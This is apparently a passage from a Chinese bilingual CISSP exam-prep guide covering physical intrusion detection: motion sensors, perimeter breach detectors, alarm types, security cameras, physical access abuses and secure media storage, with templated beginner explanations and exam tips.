最常见的系统在出入口使用简单的电路干触 点开关,以检测门或窗户是否被打开。 一些窗户可能配备内部金属丝网格或表 面粘贴的箔条,用于检测玻璃是否被打破。 一些系统甚至可能使用基于光束的 感应线机制来检测是否进入受控区域。 这与大多数自动车库门底部的安全机制 类似。 所有这些都属于周界入侵检测方法。 大多数入侵检测系统或防盗报警器 都会同时包含周界入侵检测和内部运动检测方法(参见

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 671 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

检测是 IDS,主动阻断更像 IPS。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 17 / PDF P672

第 672 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

the later sections “Motion Detectors” and “Perimeter Breach Detection”), which in turn may trigger an authority response or an audible alarm (see the later section “Intrusion Alarms”). Two aspects of any intrusion detection and alarm system can cause it to fail: how it gets its power and how it communicates. The detection and alarm mechanisms will not function if the system loses power. Thus, a reliable detection and alarm system has a battery backup with enough stored power for at least 24 hours of operation. If communication lines are cut, an alarm may not function, and security personnel and emergency services will not be notified.

Thus, a reliable detection and alarm system incorporates a heartbeat sensor for line supervision. A heartbeat sensor is a mechanism by which the communication pathway is either constantly or periodically checked with a test signal. If the receiving station detects a failed heartbeat signal, such as the loss of the constant signal or missing one or two interval checks, the alarm triggers automatically. Both measures are designed to prevent intruders from circumventing the detection and alarm system by cutting power, cutting communication cables, or jamming radio signals.

Motion Detectors A motion detector, or motion sensor, is a device that senses movement or sound in a specific area, and it is a common element of intruder detection systems. Many types of motion detectors exist, including the following: A digital motion detector monitors for significant or meaningful changes in the digital pattern of a monitored area. This is effectively a smart security camera. A passive infrared (PIR) or heat-based motion detector monitors for significant or meaningful changes in a monitored area's heat levels.

A wave pattern motion detector or microwave motion detector transmits a consistent low ultrasonic or high microwave frequency signal into a monitored area and monitors for significant or meaningful changes or disturbances in the reflected pattern. A capacitance motion detector senses changes in the electrical or magnetic field surrounding a monitored object.

中文直译 / 整理

后续章节“运动检测器”和“周界入侵检测”),这些方法可能触发相关部门 响应或发出 audible 警报(参见后续章节“入侵警报”)。 任何入侵检测和报警系统的两个方面可能导致其失效:供电方式和通信方式。 如果系统断电,检测和报警机制将无法工作。 因此,一个可靠的检测和报警系 统必须配备电池备用电源,以确保至少24小时的正常运行。 如果通信线路被切断,报警可能无法触发,安保人员和应急服务将无法收到通 知。 因此,一个可靠的检测和报警系统会集成一个心跳传感器用于线路监控。 心跳传感器是一种通过持续或定期发送测试信号来检查通信路径的机制。 如果 接收站检测到心跳信号异常,例如恒定信号丢失或错过一次或两次间隔检测, 报警将自动触发。 这两种措施旨在防止入侵者通过切断电源、剪断通信电缆或 干扰无线电信号来规避检测和报警系统。 运动探测器 一个运动探测器 , 或运动传感器 , 是一种感知运动或 用于检测特定区域内的运动,是入侵检测系统的常见组成部分。 存在多种类型 的运动探测器,包括以下几种: 一个数字运动检测器用于监测受监控区域数字模式中的显著或有意义的变 化。 这实际上是一种智能安防摄像头。

被动红外(PIR)或基于热量的运动检测器用于监测受监控区域热量水平 的显著或有意义的变化。 一个波形运动检测器或微波运动检测器向受监控区域发射一致的低频超声 波或高频微波信号,并监测反射模式中的显著或有意义的变化或干扰。 一个电容式运动检测器感应受监控物体周围电场或磁场的变化。

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 672 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 18 / PDF P673

第 673 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

A photoelectric motion detector senses changes in visible light levels for the monitored area. Photoelectric motion detectors are usually deployed in internal rooms with no windows and are kept dark. A passive audio motion detector listens for abnormal sounds in the monitored area. "Dual-technology sensors" refer to a type of sensor that combines two different technologies (typically IR motion and microwave motion detection) to enhance the accuracy and reliability of detection. These sensors are designed to minimize false alarms and improve overall performance by leveraging the strengths of multiple technologies.

Perimeter Breach Detection While motion detection mechanisms can be used to monitor for internal movement, they can also be useful to detect when a perimeter is crossed or breached. Numerous perimeter breach detection technologies may be implemented for this purpose, including contact devices and infrared linear beam sensors. Contact devices detect the opening of a window or door. Often, these are using a balanced magnetic switch (BMS). These are usually small boxes connected to the frame and a door or window. When the door or window is closed, the two BMS items are close enough to each other to keep an electric circuit open based on a magnet pulling on a metal lever.

When the door or window is opened, the switch completes once the magnet pulls far enough away to release the lever. A contact device can be directly connected to a contact alarm, so that the instant a door or window is opened, an alarm is triggered. Infrared linear beam sensors can be used to detect when someone or something crosses through a threshold, opening, or a specific area of a room. These are similar to the safety devices located at the bottom of a garage door. If the beam between the transmitter and receiver is blocked by someone walking through the beam, then the sensor notices the beam break.

This could result in sounding an alarm, notifying security guards, or triggering a safety device (such as opening or closing a door).

中文直译 / 整理

一个 光电运动探测器 会监测区域内的可见光强度变化。 光电运动探测器 通常部署在无窗户的室内,并保持黑暗状态。 一个 被动音频运动检测器 会监听监控区域内的异常声音。 "双技术传感器"是指结合了两种不同技术(通常是红外运动检测和微 波运动检测)的传感器,以提高检测的准确性和可靠性。 这些传感器旨在 通过利用多种技术的优势,最大限度地减少误报并提升整体性能。 周界入侵检测 虽然运动检测机制可用于监控内部移动,但它们也可用于检测周界是否被穿 越或侵入。 为实现这一目的,可采用多种周界入侵检测技术,包括接触装置 和红外线直线束传感器。 接触装置用于检测窗户或门的开启。 通常,这些装置使用平衡磁开关(B MS)。 这些装置通常是连接在框架以及门或窗户上的小型盒子。 当门或窗户 关闭时,两个BMS元件彼此足够接近,使磁铁吸引金属杠杆从而保持电路闭 合。 当门或窗户打开时,磁铁远离到足以释放杠杆,开关随即闭合。 接触装置 可直接连接到接触式报警器,因此一旦门或窗户被打开,报警器便会立即触发。 红外线直线型传感器可用于检测有人或物体穿过阈值、开口或房间的特定区域。 这些传感器类似于车库门底部的安全装置。

如果发射器和接收器之间的光束被 经过的人阻挡,传感器便会检测到光束中断。 这可能导致发出警报、通知保安 人员或触发安全装置(例如打开或关闭门)。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 673 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 19 / PDF P674

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Intrusion Alarms Whenever an intrusion detector registers a significant or meaningful change in the environment, it triggers an alarm. An alarm is a separate mechanism that triggers a deterrent, a repellent, and/or a notification. Deterrent alarms: Alarms that trigger deterrents may engage additional locks, shut doors, and so on. Such an alarm aims to make further intrusion or attack more difficult. Repellent alarms: Alarms that trigger repellents usually sound an audio siren or bell and turn on lights. These kinds of alarms are used to discourage intruders or attackers from continuing their malicious or trespassing activities and force them off the premises.

Notification alarms: Alarms that trigger notification are often silent from the intruder/attacker perspective but record data about the incident and notify administrators, security guards, and law enforcement. A recording of an incident can take the form of log files and/or security camera recordings. A silent alarm aims to bring authorized security personnel to the location of the intrusion or attack in hopes of catching the person(s) committing the unwanted or unauthorized acts. Alarms are also categorized by location: local, centralized, or auxiliary. Local alarm system: Local alarm systems must broadcast an audible alarm signal that can be easily heard from a distance.

Additionally, they must be protected from tampering. For a local alarm system to be effective, a security team or guards must be positioned nearby who can respond when the alarm is triggered. Central station system: The alarm is usually silent locally, but off-site monitoring agents are notified to respond to the security breach. Most residential security systems are of this type. Most central station systems are well-known or national security companies, such as Brinks and ADT. A proprietary system is similar to a central station system, but the host organization has its own on-site security staff waiting to respond to security breaches.

Auxiliary alarm system: Auxiliary alarm systems can be added to either local or centralized alarm systems. Emergency services are notified to respond to the incident and arrive at the location when the security perimeter is breached. This can include fire, police, and medical services.

中文直译 / 整理

入侵报警 每当入侵探测器检测到环境中的显著或有意义的变化时,就会触发警报。 警报 是一种独立的机制,用于触发威慑、驱赶装置和/或通知。 威慑报警:触发威慑措施的报警可能会启动额外的锁具、关闭门禁等。 此 类报警旨在增加进一步入侵或攻击的难度。 驱离报警:触发驱离措施的报警通常会发出音频警报或铃声,并开启照明。 此类报警用于阻止入侵者或攻击者继续其恶意或非法活动,并迫使其离开 现场。 通知报警:触发通知的报警从入侵者/攻击者的角度来看通常是静音的,但 会记录事件数据并通知管理员、安保人员和执法部门。 事件记录可以表现 为日志文件和/或安防摄像头录像。 静音报警旨在将授权安保人员召至入侵 或攻击地点,以期抓获实施非法或未经授权行为的人。 报警系统还可根据位置分为本地、集中式或辅助式。 本地报警系统:本地报警系统必须广播可从远处清晰听到的声响警报信 号。 此外,必须防止其被篡改。 要使本地报警系统有效,必须在附近部 署安保团队或安保人员,以便在报警触发时作出响应。 中央站系统:报警通常在本地静音,但远程监控代理会被通知以应对 安全入侵。 大多数住宅安全系统属于此类。

大多数中央站系统是知名或全 国性的安全公司,如Brinks和ADT。 专有系统与中央站系统类似,但主机 组织拥有自己的现场安保人员,随时待命以应对安全入侵。 辅助报警系统:辅助报警系统可添加到本地或集中式报警系统中。 当安全 边界被突破时,应急服务将被通知前往现场处理事件。 这可能包括消防、 警察和医疗救援服务。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

网络题先定位层次,再判断协议、设备或攻击位置。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 20 / PDF P675

第 675 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Two or more of these types of intrusion and alarm systems can be incorporated into a single solution. Secondary Verification Mechanisms When intrusion detectors, sensors, and alarms are used, secondary verification mechanisms should be in place. As the sensitivity of intrusion detection devices increases, false triggers occur more often. Innocuous events such as the presence of animals, birds, bugs, vegetation, trash, or authorized personnel can trigger false alarms.

Deploying two or more detection and sensor systems and requiring two or more triggers in quick succession before an alarm is issued may significantly reduce false alarms and increase the likelihood that alarms indicate actual intrusions or attacks. Security cameras are security mechanisms related to motion detectors, sensors, and alarms. However, a security camera is not an automated detection-and-response system. A security camera usually requires personnel to watch the captured or live video to detect suspicious and malicious activities and to trigger alarms. Security cameras can expand a security guard's effective visible range, increasing the scope of the oversight.

A security camera with AI detection capabilities may serve as a primary detection tool, but often, cameras are used as a secondary or follow-up mechanism that is reviewed after a trigger from a primary detection system occurs. The same logic used for auditing and audit trails is used for a security camera and recorded events. A visible security camera is a deterrent measure, whereas reviewing recorded events is a detection measure. Cameras Video surveillance, video monitoring, closed-circuit television (CCTV), and security cameras are all means to deter unwanted activity and create a digital record of the occurrence of events. Cameras should be positioned at exit and entry points.

Cameras should also be used to monitor activities around valuable assets and resources as well as to provide additional protection in public areas such as parking structures and walkways.

中文直译 / 整理

可以将两种或更多类型的入侵和报警系统整合到一个解决方案中。 二级验证机制 当使用入侵探测器、传感器和警报时,二级验证机制应被部署。 随着入侵检测 设备灵敏度的提高,误触发事件也会更加频繁。 动物、鸟类、昆虫、植被、垃 圾或授权人员等无害事件都可能引发误报。 部署两个或更多探测与传感器系统, 并要求在短时间内连续触发两个或更多信号后才发出警报,可显著减少误报, 并提高警报确实反映实际入侵或攻击的可能性。 安全摄像头是与运动探测器、传感器和警报相关的安全机制。 然而,安全摄像 头并非自动化检测与响应系统。 通常,安全摄像头需要人员观看录制或实时视 频,以检测可疑和恶意活动并触发警报。 安全摄像头可以扩展安保人员的有效 可视范围,扩大监督范围。 具备AI检测功能的安全摄像头可作为主要检测工具, 但通常,摄像头用作二级或后续机制,在主要检测系统触发后进行审查。 用于审计和审计跟踪的相同逻辑也用于安全摄像头和记录的事件。 可见的安全 摄像头是一种威慑措施,而审查记录的事件则是一种检测措施。 摄像头 视频监控、视频监视、闭路电视(CCTV)和安防摄像头都是用于威慑不良行 为并创建事件发生数字记录的手段。 摄像头应安装在出入口处。

还应使用摄像 头监控贵重资产和资源周围的活动,并在停车场、人行道等公共区域提供额外 保护。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 675 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

网络题先定位层次,再判断协议、设备或攻击位置。

审计题关注独立性、证据、范围和报告。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 21 / PDF P676

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Closed-circuit television (CCTV) is a security camera system that resides inside an organization's facility and is usually connected to a recording device and monitors for the security guards to view. Most traditional CCTV systems have been replaced by remote-controlled IP cameras (aka security cameras). Be sure the locations and capabilities of the security cameras are coordinated with the interior and exterior design of the facility. Cameras should be positioned to have clear sight lines of all exterior walls, entrance and exit points, and interior hallways.

Security cameras can be overt and obvious to provide a deterrent benefit, or hidden and concealed to provide a detection benefit primarily. Most security cameras record to local or cloud-based storage. Cameras vary in type, including visible light, infrared, and motion-triggered recording. Some cameras are fixed, whereas others support remote control of automated pan, tilt, and zoom (PTZ). Some camera systems include a system on a chip (SoC) or embedded components and may be able to perform various specialty functions, such as time-lapse recording, tracking, facial recognition, object detection, or infrared or color-filtered recording.

Such devices may be targeted by attackers, infected by malware, or remotely controlled by malicious actors. Dummy or decoy cameras can provide deterrence with minimal expense. Many security cameras are network-connectable (i.e., IP cameras), which allows them to be accessed and controlled over a network. Some cameras or enhanced video surveillance (EVS) systems are capable of object detection, including faces, devices, and weapons. Detection of an object or person could trigger retention of video, notification of security personnel, closing/locking doors, and/or sounding an alarm. Some cameras are activated through motion recognition.

Motion recognition can trigger a retention of video and/or notify security personnel of the event. Some EVSs can even automatically identify individuals and track their motion across the monitored area. This may include gait analysis. Gait analysis is the evaluation of the way someone walks as a form of biometric authentication or identification. Each person has a unique walking pattern, which can be used

中文直译 / 整理

闭路电视(CCTV)是一种位于组织设施内部的安全摄像头系统,通常 连接到录像设备和监控器,供安保人员查看。 大多数传统CCTV系统已被远 程控制的IP摄像头(即安防摄像头)所取代。 请确保安全摄像头的位置和功能与设施的室内和室外设计相协调。 摄像头应安 装在能够清晰拍摄所有外墙、出入口以及内部走廊的位置。 安全摄像头可以采 用显眼的设计以起到威慑作用,或采用隐蔽的方式以主要实现检测功能。 大多数安全摄像头将录像存储于本地或云存储中。 摄像头类型各异,包括可见 光、红外线和运动触发录制类型。 一些摄像头是固定的,而另一些则支持远程 控制自动的云台、俯仰和变焦(PTZ)。 一些摄像头系统包含片上系统(SoC)或嵌入式组件,能够执行各种特殊功能, 例如延时录制、追踪、人脸识别、物体检测或红外线/彩色滤光录制。 此类设备 可能成为攻击者的目标,感染恶意软件,或被恶意行为者远程控制。 假摄像头或诱饵摄像头可以以极低的成本提供威慑效果。 许多安全摄像头 支持网络连接(即IP摄像头),使其能够通过网络进行访问和控制。 某些摄像头或增强型视频监控(EVS)系统具备物体检测功能,包括人脸、设 备和武器。

检测到物体或人员可能触发视频保存、通知安保人员、关闭/锁定门 禁和/或发出警报。 某些摄像头通过运动识别激活。 运动识别可触发视频保存和/或通知安保人员事 件发生。 一些EVS甚至能自动识别个人并追踪其在监控区域内的运动。 这可能 包括步态分析。 Gait analysis是通过评估一个人的行走方式作为生物识别认证 或识别的一种形式。 每个人都有独特的行走模式,可用于

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

保留期限:保留期限规定数据、日志或记录要保存多久。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

保留太短会影响合规和取证,保留太久会增加泄露风险和成本。

网络题先定位层次,再判断协议、设备或攻击位置。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
保留期限 保留期限规定数据、日志或记录要保存多久。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 22 / PDF P677

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

to recognize them. Gait analysis can be used for walking approach authentication as well as intrusion detection. Gait analysis is effectively a biological characteristic that can be used to differentiate between authorized individuals and unauthorized intruders. Animals, birds, insects, weather, or foliage may fool simple motion recognition or motion-triggered cameras. A secondary verification mechanism should be used to distinguish between a false alarm and an intrusion. Many camera solutions and EVSs can be enhanced using machine learning to improve video monitoring through automation, improved image recognition, and pattern/activity interpretation.

Access Abuses No matter what form of physical access control is used, a security guard or other monitoring system must be deployed to prevent abuse, such as gaining unauthorized entry. Examples of access abuses of physical access controls include propping open secured doors or fail-safe exits and bypassing locks or access controls. Impersonation and masquerading are using someone else's security ID to gain entry into a facility. Tailgating and piggybacking are means to gain unauthorized entry by exploiting an authorized person. See Chapter 2, “Personnel Security and Risk Management Concepts,” for a discussion of impersonation, masquerading, tailgating, and piggybacking.

Detecting abuses like these can be done by creating audit trails, retaining access logs, using security cameras (see the previous “Cameras” section), and using security guards (see the section “Security Guards and Guard Dogs,” later in this chapter). Audit trails and access logs are useful tools even for physical access control. They may need to be created manually by security guards. Or they can be generated automatically if sufficient automated access control mechanisms (such as smartcards and certain proximity devices) are used.

The time a subject requests entry, the result of the authentication process, and the length of time the secured gate remains open are important elements to include in audit trails and access logs. In addition to using the electronic or paper trail, consider monitoring entry points with security cameras that enable the comparison of the audit trails and access logs with a visual recording of the events. Such information is critical to reconstruct the events for an intrusion, breach, or attack. Media Storage Facilities

中文直译 / 整理

识别他们。 步态分析可用于行走接近认证以及入侵检测。 步态分析本质上是一 种生物特征,可用于区分授权人员和未经授权的入侵者。 动物、鸟类、昆虫、天气或植被可能会误导简单的运动识别或运动触发摄像头。 应使用二次验证机制来区分误报和非法入侵。 许多摄像头解决方案和EVS系统 可以通过机器学习进行增强,以通过自动化、改进的图像识别和模式/活动解 释提升视频监控效果。 访问滥用 无论使用何种形式的物理访问控制,都必须部署保安人员或其他监控系统以防 止滥用,例如未经授权进入。 物理访问控制的访问滥用示例包括用物体顶住已 上锁的门或安全出口,以及绕过锁具或访问控制。 冒充和伪装是指使用他人的 安全凭证进入设施。 尾随和搭便车则是通过利用授权人员来获得未经授权的进 入权限。 参见第2章,“人员安全与风险管理概念”,了解有关冒充、伪装、尾 随和搭便车的讨论。 检测此类滥用行为可通过创建审计追踪、保留访问日志、 使用安全摄像头(参见前面的“摄像头”部分)以及使用保安人员(参见本章 后面的“保安人员与警犬”部分)来实现。 审计追踪和访问日志即使在物理访问控制中也是有用的工具。

它们可能需要由 安保人员手动创建,或者如果使用了足够的自动化访问控制机制(例如智能卡 和某些近距感应设备),则可以自动生成。 主体请求进入的时间、身份验证过 程的结果以及安全门保持开启的时间,都是审计追踪和访问日志中应包含的重 要要素。 除了使用电子或纸质记录外,还应考虑通过安全摄像头监控入口,以 便将审计追踪和访问日志与事件的视觉记录进行比对。 此类信息对于重建入侵、 泄露或攻击事件至关重要。 媒体存储设施

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

ISO 偏标准和管理体系。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
身份 身份是主体在系统中的标识。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 23 / PDF P678

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

Media storage facilities should be designed to store blank media, reusable media, and even installation media securely. Whether hard drives, flash memory devices, optical disks, or tapes, media should be protected against theft and corruption. A locked storage cabinet or closet should be sufficient for this purpose, but a safe can be installed if deemed necessary. New blank media should be secured to prevent someone from stealing it or planting malware on it. Media that is reused, such as thumb drives, flash memory cards, or portable hard drives, should be protected against theft and data remnant recovery.

Data remnants are the remaining data elements left on a storage device after an insufficient sanitization process is used (see Chapter 5, “Protecting Security of Assets”). Standard deletion or formatting processes clear out the directory structure and mark clusters as available for use but leave the original data in the clusters. A simple un-deletion utility or data recovery scanner can often recover access to these files. Restricting access to media and using secure wiping solutions can reduce this risk. Installation media must be protected against theft and malware planting. This will ensure that when a new installation needs to be performed, the media is available and safe for use.

Here are some means of implementing secure media storage facilities: Store media in a locked cabinet or safe rather than an office supply shelf. Have a media librarian or custodian who manages access to the locked media cabinet. Use a check-in/checkout process to track who retrieves, uses, and returns media from storage. For reusable media, when the device is returned, run a secure drive sanitization or zeroization (a procedure that erases data by replacing it with meaningless data such as zeroes) process to remove all data remnants.

